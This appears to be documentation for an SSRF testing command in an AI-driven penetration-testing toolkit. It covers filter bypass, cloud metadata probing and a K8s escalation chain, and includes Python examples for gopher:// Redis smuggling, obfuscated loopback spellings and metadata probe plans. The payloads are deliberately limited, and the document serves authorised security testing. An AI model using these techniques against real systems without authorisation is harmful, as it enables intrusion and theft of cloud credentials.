
SSRF Testing (/test-ssrf)

Tests for Server-Side Request Forgery vulnerabilities per OWASP Top 10 A01:2025 (Broken Access Control, into which the A10:2021 SSRF category was merged) and PortSwigger Academy. SSRF is rising in HackerOne bounties (+10% YoY, $3.5K-$50K rewards). Critical for cloud-hosted targets because the instance metadata service is reachable from inside the instance (AWS IMDSv1/v2, GCP, Azure) and a single forged request can reach it.

/test-ssrf <target_url> [collaborator_url] [engagement_dir]

Scope Routing

  • core -- Sections: STEP 0 + A + B + C0-C6 + D. Focus: standard SSRF: direct requests, cloud metadata (AWS/GCP/Azure), filter bypass (IP obfuscation, DNS rebinding, redirect chains), blind OOB detection.
  • vector -- Sections: C5 (protocol smuggling) + C7 + E + F + G + H. Focus: non-standard vectors: gopher/dict/file protocol smuggling, git:// CRLF to Redis, PDF generator, SVG, FFmpeg, PlantUML, webhook, rogue MySQL, Sentry, Spring Boot Actuator, K8s SSRF-to-RCE chain, Apache UNC paths.

Shared Steps

STEP 0 (endpoint discovery) and A (attack surface identification) always run regardless of scope -- they provide targets to all other sections.


Coverage

  • URL-Accepting Parameter Discovery -- Automated discovery of all endpoints accepting URLs: webhooks, import, link preview, proxy, fetch, download, image URL, avatar URL, feed, RSS, XML URL.
  • Basic SSRF -- Direct URL input, localhost/loopback access, internal IP range scanning (RFC 1918: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), cloud metadata endpoints.
  • Cloud Metadata -- AWS IMDSv1 (direct), AWS IMDSv2 (token-based), GCP (Metadata-Flavor: Google header), Azure (Metadata: true header). Full credential extraction path documentation.
  • Filter Bypass -- IP obfuscation (decimal, hex, octal, IPv6 mapped), DNS rebinding, URL parser differentials, redirect-based bypass, redirect loops, double encoding, fragment tricks.
  • Protocol Smuggling -- gopher://, dict://, file:// protocol exploitation. git:// CRLF injection to Redis.
  • Blind SSRF -- OOB detection via webhook.site, interactsh, Burp Collaborator. DNS-based detection.
  • Non-URL Vectors -- PDF generators (wkhtmltopdf, Puppeteer), SVG image processing, FFmpeg concat protocol, PlantUML server-side rendering, webhook configurations, git config URLs, rogue MySQL server, Sentry DSN.
  • Spring Boot Actuator -- SSRF to access Actuator endpoints (env, configprops, heapdump) on internal ports.
  • K8s SSRF-to-RCE Chain -- Full escalation: SSRF to GCP metadata to kube-env to Kubelet client certs to pod listing to service account tokens to exec.
  • Internal Port Scanning -- Scanning ports 8080, 8443, 3000, 5000, 9090 via SSRF when direct access fails.
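The Protocol Smuggling bullet above hinges on two encoding details that are easy to get wrong: the throwaway gopher item-type character and the second percent-encoding layer needed when the gopher URL rides inside an HTTP parameter. The following is an added example, not the /test-ssrf tool's own code, that builds a RESP-framed Redis command into a gopher URL, wraps it for the outer parameter, and models the server-side fetcher to confirm which bytes reach the socket. The command is PING, a reachability check only, in line with the Safety section. The application URL, parameter name and Redis address are constructed for the example.

```python
"""gopher:// protocol smuggling: packaging a raw TCP payload for an SSRF sink.

Added example, not the /test-ssrf tool's own code.  The application URL,
parameter name and Redis address used below are constructed.
"""
from urllib.parse import parse_qs, quote, unquote_to_bytes, urlsplit


def resp_encode(*args: str) -> bytes:
    """Frame a command as a RESP array of bulk strings, the form redis-cli
    sends; Redis also accepts inline commands, but RESP is unambiguous."""
    out = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        out.append(b"$%d\r\n%b\r\n" % (len(raw), raw))
    return b"".join(out)


def resp_decode(data: bytes) -> list[str]:
    """Inverse of resp_encode, used to check the payload survived both
    encoding layers.  Bulk strings containing CRLF are not handled."""
    lines = data.split(b"\r\n")
    if not lines[0].startswith(b"*"):
        raise ValueError("not a RESP array")
    count, pos, args = int(lines[0][1:]), 1, []
    for _ in range(count):
        if not lines[pos].startswith(b"$"):
            raise ValueError("expected a bulk string")
        if len(lines[pos + 1]) != int(lines[pos][1:]):
            raise ValueError("bulk string length mismatch")
        args.append(lines[pos + 1].decode())
        pos += 2
    return args


def gopher_url(host: str, port: int, payload: bytes) -> str:
    """Gopher clients, curl included, consume the first character after the
    path slash as the item-type selector, so a throwaway '_' goes there and
    the payload follows.  Every byte, CR and LF included, is percent-encoded
    so the URL stays a single token with no bare line breaks."""
    return f"gopher://{host}:{port}/_{quote(payload, safe='')}"


def wrap_in_query(app_url: str, param: str, inner_url: str) -> str:
    """Second encoding layer: inside an HTTP query parameter the gopher URL's
    own '%' signs must be encoded again, otherwise the outer parser unwraps
    one layer too early and the CRLFs are lost."""
    return f"{app_url}?{param}={quote(inner_url, safe='')}"


def bytes_reaching_socket(outer_url: str, param: str) -> bytes:
    """Model of the vulnerable fetcher: decode the parameter once, hand the
    gopher URL to the client, which decodes the path once more and writes
    the result to the TCP connection."""
    inner = parse_qs(urlsplit(outer_url).query)[param][0]
    parts = urlsplit(inner)
    if parts.scheme != "gopher" or not parts.path.startswith("/_"):
        raise ValueError("not a gopher URL with a '_' selector")
    return unquote_to_bytes(parts.path[2:])


if __name__ == "__main__":
    payload = resp_encode("PING")
    inner = gopher_url("127.0.0.1", 6379, payload)        # constructed target
    outer = wrap_in_query("https://app.example/fetch", "url", inner)
    print(outer)
    print(bytes_reaching_socket(outer, "url"))
```

Whether the payload ever reaches the socket depends on the server-side fetcher: libcurl-based stacks generally accept gopher://, while most language-native HTTP clients reject the scheme, so a successful gopher probe also fingerprints the fetcher. A `+PONG` reply, or an OOB callback if the command targets a collaborator host, is the reachability evidence; anything beyond that (writes, CONFIG SET) crosses the Safety line.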

Key Sections

  • Endpoint Discovery (STEP 0) -- Discovers all URL-accepting parameters from injectable-params.json and probes common SSRF-vulnerable endpoints.
  • Attack Surface (A) -- Identifies SSRF-prone functionality: URL previews, PDF generators, image fetchers, webhooks, OAuth callbacks, XML parsers, RSS readers, proxy functions.
  • Basic SSRF (B) -- Direct URL input (B1), localhost/loopback (B2), internal IP ranges (B3), cloud metadata (B4).
  • Filter Bypass (C0-C7) -- IP obfuscation (C0), DNS rebinding (C1), URL parser differentials (C2), redirect-based (C5), redirect loops (C6); in vector scope, C5 also covers protocol smuggling and C7 covers git:// CRLF injection.
  • Blind SSRF / OOB (D) -- OOB callback detection for blind SSRF where no response content is returned.
  • Non-URL Vectors (E) -- PDF generator SSRF, SVG processing, FFmpeg concat, PlantUML, webhook SSRF, git config, rogue MySQL, Sentry DSN.
  • Spring Boot Actuator (F) -- Actuator endpoint access via SSRF (F1-F2).
  • K8s SSRF-to-RCE (G) -- Full escalation chain documentation and detection.
  • Platform-Specific (H) -- Apache UNC paths, platform-specific SSRF notes.

Loopback Bypass Rules

When the target blocks obvious loopback values such as 127.0.0.1 or localhost, apply these general rules instead of jumping straight to exotic vectors:

  1. Start with canonical loopback representations.
  2. If the filter behaves like a blocklist (it rejects a fixed set of literal strings rather than allowing only known-good hosts), move to alternate IPv4 representations from the same semantic family: shorthand IPv4, integer-form IPv4, and alternate radix encodings.
  3. Escalate to redirect, parser-differential, or DNS-based techniques only after the simple representation family has been exhausted.
  4. Treat parser-dependent subnet or shorthand edge cases as targeted follow-up checks, not as default payloads.

The important part is sequencing: prefer the cheapest semantic-equivalent representations first, and widen the search space only after filter fingerprinting shows that the validation logic is weak or inconsistent.
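The rules above describe an ordering rather than a payload list, so the added example below (not the /test-ssrf tool's own code) makes the ordering concrete: it generates the representation ladder for an address, canonical form first, then shorthand, integer form and alternate radix, and walks it against two filters, a string-compare blocklist of the kind step 2 defeats and a filter that canonicalises before it compares. The legacy IPv4 parser is a re-implementation of the inet_aton()-style rules for illustration, not a copy of any library; the blocklist contents are constructed for the example.

```python
"""Loopback representation ladder and a canonicalising filter check.

Added example, not code from the /test-ssrf tool.  The legacy IPv4 parser
re-implements inet_aton()-style rules for illustration; BLOCKED_HOSTS is a
constructed blocklist.
"""
from __future__ import annotations

import ipaddress
import re
from typing import Callable
from urllib.parse import urlsplit

# One dotted component: 0x.. hex, leading 0 octal, else decimal.
_PART = re.compile(r"0[xX][0-9a-fA-F]*|0[0-7]*|[1-9][0-9]*")


def _parse_part(part: str) -> int | None:
    """Value of one component under legacy rules, None if it is not numeric."""
    if not _PART.fullmatch(part):
        return None
    if part[:2].lower() == "0x":
        return int(part[2:] or "0", 16)
    if part[0] == "0":
        return int(part, 8)          # "0" alone is octal zero
    return int(part)


def legacy_ipv4(host: str) -> ipaddress.IPv4Address | None:
    """Address a legacy parser derives from `host`, or None if `host` is not
    an IPv4 literal in any accepted form.  With fewer than four components
    the last one fills all remaining low-order bytes (127.1 -> 127.0.0.1)."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_parse_part(p) for p in parts]
    if any(v is None for v in values):
        return None
    *head, last = values
    if any(v > 255 for v in head) or last >= 256 ** (4 - len(head)):
        return None
    number = last
    for shift, v in enumerate(reversed(head)):
        number |= v << (8 * (4 - len(head) + shift))
    return ipaddress.IPv4Address(number)


def representation_ladder(target: str) -> list[str]:
    """Spellings of `target` in the order the rules prescribe: canonical
    first, then shorthand, integer form, then alternate radix encodings."""
    addr = ipaddress.IPv4Address(target)
    a, b, c, d = addr.packed
    n = int(addr)
    return [
        target,
        f"{a}.{(b << 16) | (c << 8) | d}",           # two-component shorthand
        f"{a}.{b}.{(c << 8) | d}",                  # three-component shorthand
        str(n),                                     # integer form
        f"0x{n:x}",                                 # hex integer
        f"0{n:o}",                                  # octal integer
        ".".join(f"0x{x:x}" for x in addr.packed),  # hex dotted
        ".".join(f"0{x:o}" for x in addr.packed),   # octal dotted
    ]


BLOCKED_HOSTS = {"127.0.0.1", "localhost", "0.0.0.0", "169.254.169.254"}


def naive_blocklist(url: str) -> bool:
    """Allow unless the host string equals a blocked literal: the filter
    shape that step 2 of the rules defeats."""
    return (urlsplit(url).hostname or "") not in BLOCKED_HOSTS


def canonicalising_filter(url: str) -> bool:
    """Parse the host exactly as a permissive fetcher would, then judge the
    resulting address rather than its spelling."""
    addr = legacy_ipv4(urlsplit(url).hostname or "")
    if addr is None:
        # A hostname rather than a literal: a production filter must resolve
        # it and re-check the result (DNS rebinding is the step-3 follow-up);
        # this example denies anything it cannot classify.
        return False
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_unspecified or addr.is_reserved or addr.is_multicast)


def first_bypass(allows: Callable[[str], bool], candidates: list[str]) -> str | None:
    """Walk the ladder in order and report the cheapest spelling the filter
    lets through, or None when every representation is caught."""
    for host in candidates:
        if allows(f"http://{host}/"):
            return host
    return None


if __name__ == "__main__":
    ladder = representation_ladder("127.0.0.1")
    print("naive blocklist bypassed by:", first_bypass(naive_blocklist, ladder))
    print("canonicalising filter bypassed by:", first_bypass(canonicalising_filter, ladder))
```

The same ladder applies to 169.254.169.254 for the metadata checks in section B4. Which forms a real target accepts depends on its URL parser, which is why the ladder is walked in order and the result is logged as a filter fingerprint before any redirect or DNS technique is tried.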


Model and Thinking Budget

  • Core SSRF -- Sonnet: systematic payload delivery and response analysis.
  • Filter bypass -- Sonnet: methodical testing of bypass techniques.
  • Chain detection -- Opus (medium): escalation chain reasoning for K8s SSRF-to-RCE.

Kill Switch

  • Timeout -- 45 minutes.
  • Max requests -- 500 (warning at 400).
  • OOB polling -- max 30 seconds wait per OOB check.

AI Decision Points

Three [AI-DECISION] markers:

  1. Server-Side vs Client-Side (A) -- Analyze whether a URL parameter is fetched server-side or only used client-side. Server-side: the application itself requests the URL, so pointing it at a controlled host produces a callback or response-content differences. Client-side: the URL is only emitted to the browser as a link or redirect, which is open-redirect territory, not SSRF.
  2. Filter Fingerprinting (C) -- Fingerprint the SSRF filter (allowlist vs blocklist, URL parser library) before selecting bypass technique. Test systematically from simple to complex.
  3. Cloud Environment Detection (D) -- Determine cloud environment from context (AWS/GCP/Azure/K8s) and select appropriate metadata endpoints and required headers.
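Decision point 3 and the Cloud Metadata coverage bullet both come down to the same table of provider-specific endpoints, methods and headers, plus the Safety rule that testing stops at the credential endpoint. The following is an added example, not the /test-ssrf tool's own code, that encodes that table as probe plans, recognises the provider from how the metadata service answers a header-less GET, and flags any URL that would return live credentials. The sample responses in the test are constructed to match the providers' documented behaviour (IMDSv2 answering 401 without a token, GCP naming the missing Metadata-Flavor header in its 403, Azure answering 400 when the Metadata header is absent); they are not captured traffic.

```python
"""Cloud metadata probe plans, provider fingerprinting, and a credential guard.

Added example, not the /test-ssrf tool's own code.  Header and endpoint
values are the providers' documented ones; the response samples used to
exercise fingerprint() are constructed, not captured.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

IMDS = "169.254.169.254"   # link-local metadata address used by AWS and Azure


@dataclass
class Probe:
    method: str
    url: str
    headers: dict[str, str] = field(default_factory=dict)
    note: str = ""


def probe_plan(provider: str) -> list[Probe]:
    """Requests in the order a test would issue them for the given provider."""
    if provider == "aws-imdsv1":
        return [
            Probe("GET", f"http://{IMDS}/latest/meta-data/"),
            Probe("GET", f"http://{IMDS}/latest/meta-data/iam/security-credentials/",
                  note="lists the role name only; fetching the role returns live keys"),
        ]
    if provider == "aws-imdsv2":
        # IMDSv2 needs a PUT with a TTL header to mint a session token before
        # any GET is honoured.  A GET-only SSRF cannot issue that PUT, so v2
        # enforcement blocks it unless the vector gives full request control
        # (a gopher:// sink, for instance).
        return [
            Probe("PUT", f"http://{IMDS}/latest/api/token",
                  {"X-aws-ec2-metadata-token-ttl-seconds": "21600"}),
            Probe("GET", f"http://{IMDS}/latest/meta-data/",
                  {"X-aws-ec2-metadata-token": "<token from the PUT>"}),
        ]
    if provider == "gcp":
        return [
            Probe("GET", "http://metadata.google.internal/computeMetadata/v1/",
                  {"Metadata-Flavor": "Google"}),
            Probe("GET", "http://metadata.google.internal/computeMetadata/v1/instance/attributes/",
                  {"Metadata-Flavor": "Google"},
                  note="kube-env is served here on GKE nodes; first link of the K8s chain"),
        ]
    if provider == "azure":
        return [
            Probe("GET", f"http://{IMDS}/metadata/instance?api-version=2021-02-01",
                  {"Metadata": "true"}),
        ]
    raise ValueError(f"unknown provider: {provider}")


def fingerprint(status: int, headers: dict[str, str], body: str) -> str:
    """Classify the provider from the reply to a plain GET carrying no
    provider-specific header, which is all a GET-only SSRF can send."""
    h = {k.lower(): v for k, v in headers.items()}
    if h.get("metadata-flavor") == "Google" or "Metadata-Flavor" in body:
        return "gcp"               # GCP echoes the header and names it in its 403 text
    if h.get("server", "").lower() == "ec2ws":
        return "aws-imdsv2" if status == 401 else "aws-imdsv1"   # 401: token required
    if status == 400 and "metadata header" in body.lower():
        return "azure"             # Azure rejects a missing "Metadata: true" with 400
    return "unknown"


CREDENTIAL_ENDPOINTS = (
    r"/latest/meta-data/iam/security-credentials/[^/?#]+",           # AWS: keys for a named role
    r"/computeMetadata/v1/instance/service-accounts/[^/]+/token",   # GCP: service-account token
    r"/metadata/identity/oauth2/token",                             # Azure: managed-identity token
)


def crosses_credential_line(url: str) -> bool:
    """True when a request would return live credentials rather than
    metadata; the Safety rule says stop and document before this point."""
    return any(re.search(p, url) for p in CREDENTIAL_ENDPOINTS)


if __name__ == "__main__":
    for provider in ("aws-imdsv1", "aws-imdsv2", "gcp", "azure"):
        for p in probe_plan(provider):
            print(provider, p.method, p.url, p.headers, p.note)
```

Every URL in the plans stays on the safe side of `crosses_credential_line`; the guard exists so that a test harness refuses to follow a directory listing one step further into `security-credentials/<role>` or `service-accounts/<account>/token`, which is exactly where the Safety section says to stop and document.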

Knowledge Packs and Cheatsheets

  • SSRF cheatsheet -- helpers/cheatsheet-ssrf.md
  • Cloud metadata payloads -- payloads/cloud-metadata.md
  • OOB detection guide -- payloads/oob-detection.md
  • Research terms -- helpers/research-terms.md
  • Exemplars -- helpers/exemplars.md

External payload files: PayloadsAllTheThings SSRF payloads, URL bypass intruder lists.


Safety

  • Use OOB callback services (webhook.site, interactsh) for blind detection.
  • Never attack internal services -- only detect reachability.
  • Never access real cloud credentials -- stop at the credential endpoint and document.
  • All findings require a working, reproducible PoC.